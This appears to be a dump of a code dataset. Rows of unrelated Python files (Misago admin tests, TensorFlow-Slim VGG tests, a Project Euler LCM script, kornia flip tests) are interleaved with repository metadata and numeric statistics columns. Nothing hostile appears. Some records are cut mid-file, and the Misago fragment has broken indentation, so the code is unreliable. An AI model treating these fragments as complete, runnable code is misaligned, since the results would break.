    self.assertEqual(response.status_code, 200)

    response_dict = response.json()
    self.assertEqual(response_dict['deleted_count'], 0)
    self.assertTrue(response_dict['is_completed'])
def test_delete_account_view(self):
    """delete user account view deletes user account"""
    user = UserModel.objects.create_user('Bob', 'bob@test.com', 'pass123')
    link = reverse(
        'misago:admin:users:accounts:delete-account', kwargs={'pk': user.pk})

    # Account deletion runs in a single step for a fresh user.
    response = self.client.post(link, **self.AJAX_HEADER)
    self.assertEqual(response.status_code, 200)
    self.assertTrue(response.json()['is_completed'])
| 38.131868
| 91
| 0.575324
| 3,009
| 27,760
| 5.059156
| 0.07112
| 0.038889
| 0.050844
| 0.066675
| 0.869934
| 0.856599
| 0.833279
| 0.824936
| 0.81528
| 0.811207
| 0
| 0.018501
| 0.302954
| 27,760
| 727
| 92
| 38.184319
| 0.768217
| 0.039085
| 0
| 0.752525
| 0
| 0
| 0.214924
| 0.096288
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.037037
| false
| 0.063973
| 0.015152
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
07de045b105a45f7f2ffc55d89376d13d03e59d2
| 25,940
|
py
|
Python
|
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | 9
|
2018-12-21T15:11:43.000Z
|
2021-04-28T06:49:30.000Z
|
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | null | null | null |
research/slim/nets/vgg_test.py
|
Dzinushi/models_1_4
|
d7e72793a68c1667d403b1542c205d1cd9b1d17c
|
[
"Apache-2.0"
] | 6
|
2019-01-25T02:53:39.000Z
|
2021-04-28T06:49:33.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for slim.nets.vgg."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import vgg
slim = tf.contrib.slim
class VGGATest(tf.test.TestCase):
  """Unit tests for the VGG-A (11-layer) builder `vgg.vgg_a`."""

  def testBuild(self):
    """Logits op has the expected name and a [batch, classes] shape."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_a(inputs, num_classes)
      # assertEquals is a deprecated alias of assertEqual (removed in
      # Python 3.12); use the canonical spelling throughout this class.
      self.assertEqual(logits.op.name, 'vgg_a/fc8/squeezed')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])

  def testFullyConvolutional(self):
    """With spatial_squeeze=False a 256x256 input keeps a 2x2 spatial map."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_a(inputs, num_classes, spatial_squeeze=False)
      self.assertEqual(logits.op.name, 'vgg_a/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 2, 2, num_classes])

  def testGlobalPool(self):
    """global_pool=True collapses the spatial dimensions to 1x1."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_a(inputs, num_classes, spatial_squeeze=False,
                            global_pool=True)
      self.assertEqual(logits.op.name, 'vgg_a/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 1, 1, num_classes])

  def testEndPoints(self):
    """The end-points dict exposes exactly the expected layer names."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      _, end_points = vgg.vgg_a(inputs, num_classes)
      expected_names = ['vgg_a/conv1/conv1_1',
                        'vgg_a/pool1',
                        'vgg_a/conv2/conv2_1',
                        'vgg_a/pool2',
                        'vgg_a/conv3/conv3_1',
                        'vgg_a/conv3/conv3_2',
                        'vgg_a/pool3',
                        'vgg_a/conv4/conv4_1',
                        'vgg_a/conv4/conv4_2',
                        'vgg_a/pool4',
                        'vgg_a/conv5/conv5_1',
                        'vgg_a/conv5/conv5_2',
                        'vgg_a/pool5',
                        'vgg_a/fc6',
                        'vgg_a/fc7',
                        'vgg_a/fc8'
                       ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))

  def testNoClasses(self):
    """num_classes=None omits the fc8 logits layer and returns fc7 features."""
    batch_size = 5
    height, width = 224, 224
    num_classes = None
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      net, end_points = vgg.vgg_a(inputs, num_classes)
      expected_names = ['vgg_a/conv1/conv1_1',
                        'vgg_a/pool1',
                        'vgg_a/conv2/conv2_1',
                        'vgg_a/pool2',
                        'vgg_a/conv3/conv3_1',
                        'vgg_a/conv3/conv3_2',
                        'vgg_a/pool3',
                        'vgg_a/conv4/conv4_1',
                        'vgg_a/conv4/conv4_2',
                        'vgg_a/pool4',
                        'vgg_a/conv5/conv5_1',
                        'vgg_a/conv5/conv5_2',
                        'vgg_a/pool5',
                        'vgg_a/fc6',
                        'vgg_a/fc7',
                       ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))
      self.assertTrue(net.op.name.startswith('vgg_a/fc7'))

  def testModelVariables(self):
    """Every conv/fc layer registers a weights and a biases model variable."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      vgg.vgg_a(inputs, num_classes)
      expected_names = ['vgg_a/conv1/conv1_1/weights',
                        'vgg_a/conv1/conv1_1/biases',
                        'vgg_a/conv2/conv2_1/weights',
                        'vgg_a/conv2/conv2_1/biases',
                        'vgg_a/conv3/conv3_1/weights',
                        'vgg_a/conv3/conv3_1/biases',
                        'vgg_a/conv3/conv3_2/weights',
                        'vgg_a/conv3/conv3_2/biases',
                        'vgg_a/conv4/conv4_1/weights',
                        'vgg_a/conv4/conv4_1/biases',
                        'vgg_a/conv4/conv4_2/weights',
                        'vgg_a/conv4/conv4_2/biases',
                        'vgg_a/conv5/conv5_1/weights',
                        'vgg_a/conv5/conv5_1/biases',
                        'vgg_a/conv5/conv5_2/weights',
                        'vgg_a/conv5/conv5_2/biases',
                        'vgg_a/fc6/weights',
                        'vgg_a/fc6/biases',
                        'vgg_a/fc7/weights',
                        'vgg_a/fc7/biases',
                        'vgg_a/fc8/weights',
                        'vgg_a/fc8/biases',
                       ]
      model_variables = [v.op.name for v in slim.get_model_variables()]
      self.assertSetEqual(set(model_variables), set(expected_names))

  def testEvaluation(self):
    """Inference mode preserves the [batch, classes] logits shape."""
    batch_size = 2
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      eval_inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_a(eval_inputs, is_training=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])
      predictions = tf.argmax(logits, 1)
      self.assertListEqual(predictions.get_shape().as_list(), [batch_size])

  def testTrainEvalWithReuse(self):
    """Variables built at train resolution can be reused at eval resolution."""
    train_batch_size = 2
    eval_batch_size = 1
    train_height, train_width = 224, 224
    eval_height, eval_width = 256, 256
    num_classes = 1000
    with self.test_session():
      train_inputs = tf.random_uniform(
          (train_batch_size, train_height, train_width, 3))
      logits, _ = vgg.vgg_a(train_inputs)
      self.assertListEqual(logits.get_shape().as_list(),
                           [train_batch_size, num_classes])
      tf.get_variable_scope().reuse_variables()
      eval_inputs = tf.random_uniform(
          (eval_batch_size, eval_height, eval_width, 3))
      logits, _ = vgg.vgg_a(eval_inputs, is_training=False,
                            spatial_squeeze=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [eval_batch_size, 2, 2, num_classes])
      logits = tf.reduce_mean(logits, [1, 2])
      predictions = tf.argmax(logits, 1)
      # Was deprecated assertEquals; assertListEqual matches the list
      # comparisons used elsewhere in this file.
      self.assertListEqual(predictions.get_shape().as_list(),
                           [eval_batch_size])

  def testForward(self):
    """A full forward pass runs and produces a non-zero output."""
    batch_size = 1
    height, width = 224, 224
    with self.test_session() as sess:
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_a(inputs)
      sess.run(tf.global_variables_initializer())
      output = sess.run(logits)
      self.assertTrue(output.any())
class VGG16Test(tf.test.TestCase):
  """Unit tests for the VGG-16 builder `vgg.vgg_16`."""

  def testBuild(self):
    """Logits op has the expected name and a [batch, classes] shape."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_16(inputs, num_classes)
      # assertEquals is a deprecated alias of assertEqual (removed in
      # Python 3.12); use the canonical spelling throughout this class.
      self.assertEqual(logits.op.name, 'vgg_16/fc8/squeezed')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])

  def testFullyConvolutional(self):
    """With spatial_squeeze=False a 256x256 input keeps a 2x2 spatial map."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_16(inputs, num_classes, spatial_squeeze=False)
      self.assertEqual(logits.op.name, 'vgg_16/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 2, 2, num_classes])

  def testGlobalPool(self):
    """global_pool=True collapses the spatial dimensions to 1x1."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_16(inputs, num_classes, spatial_squeeze=False,
                             global_pool=True)
      self.assertEqual(logits.op.name, 'vgg_16/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 1, 1, num_classes])

  def testEndPoints(self):
    """The end-points dict exposes exactly the expected layer names."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      _, end_points = vgg.vgg_16(inputs, num_classes)
      expected_names = ['vgg_16/conv1/conv1_1',
                        'vgg_16/conv1/conv1_2',
                        'vgg_16/pool1',
                        'vgg_16/conv2/conv2_1',
                        'vgg_16/conv2/conv2_2',
                        'vgg_16/pool2',
                        'vgg_16/conv3/conv3_1',
                        'vgg_16/conv3/conv3_2',
                        'vgg_16/conv3/conv3_3',
                        'vgg_16/pool3',
                        'vgg_16/conv4/conv4_1',
                        'vgg_16/conv4/conv4_2',
                        'vgg_16/conv4/conv4_3',
                        'vgg_16/pool4',
                        'vgg_16/conv5/conv5_1',
                        'vgg_16/conv5/conv5_2',
                        'vgg_16/conv5/conv5_3',
                        'vgg_16/pool5',
                        'vgg_16/fc6',
                        'vgg_16/fc7',
                        'vgg_16/fc8'
                       ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))

  def testNoClasses(self):
    """num_classes=None omits the fc8 logits layer and returns fc7 features."""
    batch_size = 5
    height, width = 224, 224
    num_classes = None
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      net, end_points = vgg.vgg_16(inputs, num_classes)
      expected_names = ['vgg_16/conv1/conv1_1',
                        'vgg_16/conv1/conv1_2',
                        'vgg_16/pool1',
                        'vgg_16/conv2/conv2_1',
                        'vgg_16/conv2/conv2_2',
                        'vgg_16/pool2',
                        'vgg_16/conv3/conv3_1',
                        'vgg_16/conv3/conv3_2',
                        'vgg_16/conv3/conv3_3',
                        'vgg_16/pool3',
                        'vgg_16/conv4/conv4_1',
                        'vgg_16/conv4/conv4_2',
                        'vgg_16/conv4/conv4_3',
                        'vgg_16/pool4',
                        'vgg_16/conv5/conv5_1',
                        'vgg_16/conv5/conv5_2',
                        'vgg_16/conv5/conv5_3',
                        'vgg_16/pool5',
                        'vgg_16/fc6',
                        'vgg_16/fc7',
                       ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))
      self.assertTrue(net.op.name.startswith('vgg_16/fc7'))

  def testModelVariables(self):
    """Every conv/fc layer registers a weights and a biases model variable."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      vgg.vgg_16(inputs, num_classes)
      expected_names = ['vgg_16/conv1/conv1_1/weights',
                        'vgg_16/conv1/conv1_1/biases',
                        'vgg_16/conv1/conv1_2/weights',
                        'vgg_16/conv1/conv1_2/biases',
                        'vgg_16/conv2/conv2_1/weights',
                        'vgg_16/conv2/conv2_1/biases',
                        'vgg_16/conv2/conv2_2/weights',
                        'vgg_16/conv2/conv2_2/biases',
                        'vgg_16/conv3/conv3_1/weights',
                        'vgg_16/conv3/conv3_1/biases',
                        'vgg_16/conv3/conv3_2/weights',
                        'vgg_16/conv3/conv3_2/biases',
                        'vgg_16/conv3/conv3_3/weights',
                        'vgg_16/conv3/conv3_3/biases',
                        'vgg_16/conv4/conv4_1/weights',
                        'vgg_16/conv4/conv4_1/biases',
                        'vgg_16/conv4/conv4_2/weights',
                        'vgg_16/conv4/conv4_2/biases',
                        'vgg_16/conv4/conv4_3/weights',
                        'vgg_16/conv4/conv4_3/biases',
                        'vgg_16/conv5/conv5_1/weights',
                        'vgg_16/conv5/conv5_1/biases',
                        'vgg_16/conv5/conv5_2/weights',
                        'vgg_16/conv5/conv5_2/biases',
                        'vgg_16/conv5/conv5_3/weights',
                        'vgg_16/conv5/conv5_3/biases',
                        'vgg_16/fc6/weights',
                        'vgg_16/fc6/biases',
                        'vgg_16/fc7/weights',
                        'vgg_16/fc7/biases',
                        'vgg_16/fc8/weights',
                        'vgg_16/fc8/biases',
                       ]
      model_variables = [v.op.name for v in slim.get_model_variables()]
      self.assertSetEqual(set(model_variables), set(expected_names))

  def testEvaluation(self):
    """Inference mode preserves the [batch, classes] logits shape."""
    batch_size = 2
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      eval_inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_16(eval_inputs, is_training=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])
      predictions = tf.argmax(logits, 1)
      self.assertListEqual(predictions.get_shape().as_list(), [batch_size])

  def testTrainEvalWithReuse(self):
    """Variables built at train resolution can be reused at eval resolution."""
    train_batch_size = 2
    eval_batch_size = 1
    train_height, train_width = 224, 224
    eval_height, eval_width = 256, 256
    num_classes = 1000
    with self.test_session():
      train_inputs = tf.random_uniform(
          (train_batch_size, train_height, train_width, 3))
      logits, _ = vgg.vgg_16(train_inputs)
      self.assertListEqual(logits.get_shape().as_list(),
                           [train_batch_size, num_classes])
      tf.get_variable_scope().reuse_variables()
      eval_inputs = tf.random_uniform(
          (eval_batch_size, eval_height, eval_width, 3))
      logits, _ = vgg.vgg_16(eval_inputs, is_training=False,
                             spatial_squeeze=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [eval_batch_size, 2, 2, num_classes])
      logits = tf.reduce_mean(logits, [1, 2])
      predictions = tf.argmax(logits, 1)
      # Was deprecated assertEquals; assertListEqual matches the list
      # comparisons used elsewhere in this file.
      self.assertListEqual(predictions.get_shape().as_list(),
                           [eval_batch_size])

  def testForward(self):
    """A full forward pass runs and produces a non-zero output."""
    batch_size = 1
    height, width = 224, 224
    with self.test_session() as sess:
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_16(inputs)
      sess.run(tf.global_variables_initializer())
      output = sess.run(logits)
      self.assertTrue(output.any())
class VGG19Test(tf.test.TestCase):
  """Unit tests for the VGG-19 builder `vgg.vgg_19`."""

  def testBuild(self):
    """Logits op has the expected name and a [batch, classes] shape."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_19(inputs, num_classes)
      # assertEquals is a deprecated alias of assertEqual (removed in
      # Python 3.12); use the canonical spelling throughout this class.
      self.assertEqual(logits.op.name, 'vgg_19/fc8/squeezed')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])

  def testFullyConvolutional(self):
    """With spatial_squeeze=False a 256x256 input keeps a 2x2 spatial map."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_19(inputs, num_classes, spatial_squeeze=False)
      self.assertEqual(logits.op.name, 'vgg_19/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 2, 2, num_classes])

  def testGlobalPool(self):
    """global_pool=True collapses the spatial dimensions to 1x1."""
    batch_size = 1
    height, width = 256, 256
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_19(inputs, num_classes, spatial_squeeze=False,
                             global_pool=True)
      self.assertEqual(logits.op.name, 'vgg_19/fc8/BiasAdd')
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, 1, 1, num_classes])

  def testEndPoints(self):
    """The end-points dict exposes exactly the expected layer names."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      _, end_points = vgg.vgg_19(inputs, num_classes)
      expected_names = [
          'vgg_19/conv1/conv1_1',
          'vgg_19/conv1/conv1_2',
          'vgg_19/pool1',
          'vgg_19/conv2/conv2_1',
          'vgg_19/conv2/conv2_2',
          'vgg_19/pool2',
          'vgg_19/conv3/conv3_1',
          'vgg_19/conv3/conv3_2',
          'vgg_19/conv3/conv3_3',
          'vgg_19/conv3/conv3_4',
          'vgg_19/pool3',
          'vgg_19/conv4/conv4_1',
          'vgg_19/conv4/conv4_2',
          'vgg_19/conv4/conv4_3',
          'vgg_19/conv4/conv4_4',
          'vgg_19/pool4',
          'vgg_19/conv5/conv5_1',
          'vgg_19/conv5/conv5_2',
          'vgg_19/conv5/conv5_3',
          'vgg_19/conv5/conv5_4',
          'vgg_19/pool5',
          'vgg_19/fc6',
          'vgg_19/fc7',
          'vgg_19/fc8'
      ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))

  def testNoClasses(self):
    """num_classes=None omits the fc8 logits layer and returns fc7 features."""
    batch_size = 5
    height, width = 224, 224
    num_classes = None
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      net, end_points = vgg.vgg_19(inputs, num_classes)
      expected_names = [
          'vgg_19/conv1/conv1_1',
          'vgg_19/conv1/conv1_2',
          'vgg_19/pool1',
          'vgg_19/conv2/conv2_1',
          'vgg_19/conv2/conv2_2',
          'vgg_19/pool2',
          'vgg_19/conv3/conv3_1',
          'vgg_19/conv3/conv3_2',
          'vgg_19/conv3/conv3_3',
          'vgg_19/conv3/conv3_4',
          'vgg_19/pool3',
          'vgg_19/conv4/conv4_1',
          'vgg_19/conv4/conv4_2',
          'vgg_19/conv4/conv4_3',
          'vgg_19/conv4/conv4_4',
          'vgg_19/pool4',
          'vgg_19/conv5/conv5_1',
          'vgg_19/conv5/conv5_2',
          'vgg_19/conv5/conv5_3',
          'vgg_19/conv5/conv5_4',
          'vgg_19/pool5',
          'vgg_19/fc6',
          'vgg_19/fc7',
      ]
      self.assertSetEqual(set(end_points.keys()), set(expected_names))
      self.assertTrue(net.op.name.startswith('vgg_19/fc7'))

  def testModelVariables(self):
    """Every conv/fc layer registers a weights and a biases model variable."""
    batch_size = 5
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      inputs = tf.random_uniform((batch_size, height, width, 3))
      vgg.vgg_19(inputs, num_classes)
      expected_names = [
          'vgg_19/conv1/conv1_1/weights',
          'vgg_19/conv1/conv1_1/biases',
          'vgg_19/conv1/conv1_2/weights',
          'vgg_19/conv1/conv1_2/biases',
          'vgg_19/conv2/conv2_1/weights',
          'vgg_19/conv2/conv2_1/biases',
          'vgg_19/conv2/conv2_2/weights',
          'vgg_19/conv2/conv2_2/biases',
          'vgg_19/conv3/conv3_1/weights',
          'vgg_19/conv3/conv3_1/biases',
          'vgg_19/conv3/conv3_2/weights',
          'vgg_19/conv3/conv3_2/biases',
          'vgg_19/conv3/conv3_3/weights',
          'vgg_19/conv3/conv3_3/biases',
          'vgg_19/conv3/conv3_4/weights',
          'vgg_19/conv3/conv3_4/biases',
          'vgg_19/conv4/conv4_1/weights',
          'vgg_19/conv4/conv4_1/biases',
          'vgg_19/conv4/conv4_2/weights',
          'vgg_19/conv4/conv4_2/biases',
          'vgg_19/conv4/conv4_3/weights',
          'vgg_19/conv4/conv4_3/biases',
          'vgg_19/conv4/conv4_4/weights',
          'vgg_19/conv4/conv4_4/biases',
          'vgg_19/conv5/conv5_1/weights',
          'vgg_19/conv5/conv5_1/biases',
          'vgg_19/conv5/conv5_2/weights',
          'vgg_19/conv5/conv5_2/biases',
          'vgg_19/conv5/conv5_3/weights',
          'vgg_19/conv5/conv5_3/biases',
          'vgg_19/conv5/conv5_4/weights',
          'vgg_19/conv5/conv5_4/biases',
          'vgg_19/fc6/weights',
          'vgg_19/fc6/biases',
          'vgg_19/fc7/weights',
          'vgg_19/fc7/biases',
          'vgg_19/fc8/weights',
          'vgg_19/fc8/biases',
      ]
      model_variables = [v.op.name for v in slim.get_model_variables()]
      self.assertSetEqual(set(model_variables), set(expected_names))

  def testEvaluation(self):
    """Inference mode preserves the [batch, classes] logits shape."""
    batch_size = 2
    height, width = 224, 224
    num_classes = 1000
    with self.test_session():
      eval_inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_19(eval_inputs, is_training=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [batch_size, num_classes])
      predictions = tf.argmax(logits, 1)
      self.assertListEqual(predictions.get_shape().as_list(), [batch_size])

  def testTrainEvalWithReuse(self):
    """Variables built at train resolution can be reused at eval resolution."""
    train_batch_size = 2
    eval_batch_size = 1
    train_height, train_width = 224, 224
    eval_height, eval_width = 256, 256
    num_classes = 1000
    with self.test_session():
      train_inputs = tf.random_uniform(
          (train_batch_size, train_height, train_width, 3))
      logits, _ = vgg.vgg_19(train_inputs)
      self.assertListEqual(logits.get_shape().as_list(),
                           [train_batch_size, num_classes])
      tf.get_variable_scope().reuse_variables()
      eval_inputs = tf.random_uniform(
          (eval_batch_size, eval_height, eval_width, 3))
      logits, _ = vgg.vgg_19(eval_inputs, is_training=False,
                             spatial_squeeze=False)
      self.assertListEqual(logits.get_shape().as_list(),
                           [eval_batch_size, 2, 2, num_classes])
      logits = tf.reduce_mean(logits, [1, 2])
      predictions = tf.argmax(logits, 1)
      # Was deprecated assertEquals; assertListEqual matches the list
      # comparisons used elsewhere in this file.
      self.assertListEqual(predictions.get_shape().as_list(),
                           [eval_batch_size])

  def testForward(self):
    """A full forward pass runs and produces a non-zero output."""
    batch_size = 1
    height, width = 224, 224
    with self.test_session() as sess:
      inputs = tf.random_uniform((batch_size, height, width, 3))
      logits, _ = vgg.vgg_19(inputs)
      sess.run(tf.global_variables_initializer())
      output = sess.run(logits)
      self.assertTrue(output.any())
# Run all TestCase classes in this module via the tf.test runner when
# executed as a script.
if __name__ == '__main__':
  tf.test.main()
| 44.34188
| 83
| 0.504588
| 2,844
| 25,940
| 4.308017
| 0.061885
| 0.040402
| 0.03428
| 0.05142
| 0.92491
| 0.804767
| 0.793748
| 0.793748
| 0.79334
| 0.785749
| 0
| 0.079391
| 0.38963
| 25,940
| 584
| 84
| 44.417808
| 0.694436
| 0.026291
| 0
| 0.715631
| 0
| 0
| 0.177741
| 0.079995
| 0
| 0
| 0
| 0
| 0.090395
| 1
| 0.050847
| false
| 0
| 0.009416
| 0
| 0.065913
| 0.001883
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed10f6aee5348f898ba8bed4639d058020542b36
| 51
|
py
|
Python
|
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | 15
|
2015-02-04T13:47:04.000Z
|
2021-12-22T08:40:13.000Z
|
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | null | null | null |
src/005. Smallest multiple/005.py
|
yuhao600/project-euler
|
201fc68aa9cca63b751036bb61623c12939dcac4
|
[
"MIT"
] | 3
|
2016-02-19T10:47:31.000Z
|
2017-03-03T16:44:15.000Z
|
from math import gcd


def smallest_multiple(limit=20):
    """Return the smallest positive number evenly divisible by 1..limit.

    Project Euler problem 5. The original script printed the hard-coded
    prime factorization 2**4 * 3**2 * 5 * 7 * 11 * 13 * 17 * 19 (valid
    only for limit=20); this computes the LCM for any limit >= 1.
    """
    result = 1
    for k in range(2, limit + 1):
        # lcm(a, b) == a * b // gcd(a, b); fold over 2..limit.
        result = result * k // gcd(result, k)
    return result


# Same output as the original one-liner: 232792560.
print(smallest_multiple(20))
| 25.5
| 50
| 0.372549
| 11
| 51
| 1.727273
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4375
| 0.372549
| 51
| 1
| 51
| 51
| 0.15625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ed17897d3d9f58ed7bbfc779290bd24a9f15fcc2
| 6,440
|
py
|
Python
|
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
test/geometry/transform/test_flip.py
|
ChristophReich1996/kornia
|
35f955b46e8015da1cb9faa28c6943ec2b09cc2a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import pytest
import torch
from torch.autograd import gradcheck
from torch.testing import assert_allclose
import kornia
import kornia.testing as utils # test utils
class TestVflip:
    """Tests for kornia.Vflip (vertical flip)."""

    def test_smoke(self, device, dtype):
        # Renamed from `smoke_test`: pytest only collects methods named
        # `test_*`, so under the old name this check never ran.
        f = kornia.Vflip()
        expected_repr = "Vflip()"  # avoid shadowing builtin `repr`
        assert str(f) == expected_repr

    def test_vflip(self, device, dtype):
        """Flipping a 3x3 image moves the bottom row to the top."""
        f = kornia.Vflip()
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        expected = torch.tensor([[0., 1., 1.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype)  # 3 x 3
        assert (f(input) == expected).all()

    def test_batch_vflip(self, device, dtype):
        """The flip applies independently to each image of a batch."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        f = kornia.Vflip()
        expected = torch.tensor([[[0., 1., 1.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype)  # 1 x 3 x 3
        expected = expected.repeat(2, 1, 1)  # 2 x 3 x 3
        assert (f(input) == expected).all()

    @pytest.mark.skip(reason="turn off all jit for a while")
    def test_jit(self, device, dtype):
        """JIT-traced vflip matches the eager result."""
        @torch.jit.script
        def op_script(data: torch.Tensor) -> torch.Tensor:
            return kornia.vflip(data)
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        # Build jit trace
        op_trace = torch.jit.trace(op_script, (input, ))
        # Create new inputs
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [5., 5., 0.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        expected = torch.tensor([[[5., 5., 0.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype)  # 1 x 3 x 3
        expected = expected.repeat(2, 1, 1)
        actual = op_trace(input)
        assert_allclose(actual, expected)

    def test_gradcheck(self, device, dtype):
        """vflip is differentiable with respect to its input."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
